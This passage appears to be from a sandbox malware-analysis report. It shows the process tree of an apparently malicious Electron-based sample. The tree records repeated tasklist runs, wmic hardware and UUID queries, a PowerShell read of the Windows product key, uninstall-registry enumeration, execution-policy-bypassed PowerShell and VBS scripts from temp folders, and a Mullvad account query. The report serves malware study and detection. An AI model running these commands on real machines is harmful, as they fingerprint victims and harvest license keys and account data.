    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5780
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5796
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5816
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5832
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5856
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5872
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5888
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5916
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5932
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5964
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5976
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6000
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6020
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6036
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6044
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6064
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6080
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6104
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6128
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:904
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2092
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3236
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5164
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5220
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:9088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6148
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6156
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "net session"
  2⤵
  PID:6168
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:9412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:10396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"
  2⤵
  PID:6176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:6188
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:8468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
  2⤵
  PID:6200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic OS get caption, osarchitecture
    3⤵
    PID:8776
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:9404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
  2⤵
  PID:11976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:12016
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:12024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
  2⤵
  PID:12080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:12124
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:12132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  2⤵
  PID:12184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:12224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
  2⤵
  PID:9908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:11528
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:11476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
  2⤵
  PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=NaN get ExecutablePath
    3⤵
    PID:9628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:2280
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8404
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:3552
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
  2⤵
  PID:2052
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
    3⤵
    PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
  2⤵
  PID:5348
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
    3⤵
    PID:5736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
  2⤵
  PID:7464
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
    3⤵
    PID:12224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
  2⤵
  PID:8020
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
    3⤵
    PID:7904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
  2⤵
  PID:11404
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
    3⤵
    PID:11088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
  2⤵
  PID:9872
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
    3⤵
    PID:6964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
  2⤵
  PID:7812
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
    3⤵
    PID:9868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
  2⤵
  PID:10796
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
    3⤵
    PID:8128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
  2⤵
  PID:3452
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
    3⤵
    PID:9964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
  2⤵
  PID:10072
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
    3⤵
    PID:6124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
  2⤵
  PID:9220
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
    3⤵
    PID:5716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
  2⤵
  PID:7244
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
    3⤵
    PID:5644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
  2⤵
  PID:5840
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
    3⤵
    PID:10856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
  2⤵
  PID:8988
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
    3⤵
    PID:10596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
  2⤵
  PID:8888
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
    3⤵
    PID:9972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
  2⤵
  PID:8112
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
    3⤵
    PID:10152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
  2⤵
  PID:5156
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
    3⤵
    PID:10304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
  2⤵
  PID:9956
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
    3⤵
    PID:9844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
  2⤵
  PID:6384
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
    3⤵
    PID:6768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
  2⤵
  PID:9816
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
    3⤵
    PID:8452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
  2⤵
  PID:7132
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
    3⤵
    PID:6864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
  2⤵
  PID:5652
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
    3⤵
    PID:10264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
  2⤵
  PID:8952
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
    3⤵
    PID:9880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
  2⤵
  PID:9240
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
    3⤵
    PID:5884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
  2⤵
  PID:5620
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
    3⤵
    PID:12004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
  2⤵
  PID:6136
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
    3⤵
    PID:8764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
  2⤵
  PID:7432
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
    3⤵
    PID:12172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
  2⤵
  PID:10376
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
    3⤵
    PID:10356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
  2⤵
  PID:10688
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
    3⤵
    PID:10424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
  2⤵
  PID:8240
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
    3⤵
    PID:8732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
  2⤵
  PID:5976
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
    3⤵
    PID:6620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
  2⤵
  PID:5284
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
    3⤵
    PID:8100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
  2⤵
  PID:5272
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
    3⤵
    PID:11240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
  2⤵
  PID:5256
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
    3⤵
    PID:9764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
  2⤵
  PID:8180
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
    3⤵
    PID:6244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
  2⤵
  PID:6928
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
    3⤵
    PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
  2⤵
  PID:4964
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
    3⤵
    PID:9500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
  2⤵
  PID:8184
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
    3⤵
    PID:6844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
  2⤵
  PID:9644
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
    3⤵
    PID:7116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\p8GmZ53VLsMO_tezmp.ps1""
  2⤵
  PID:11508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\p8GmZ53VLsMO_tezmp.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\XLgcA2iauD7X.vbs"
  2⤵
  PID:6520
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Roaming\XLgcA2iauD7X.vbs
    3⤵
    PID:6632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
  2⤵
  PID:9252
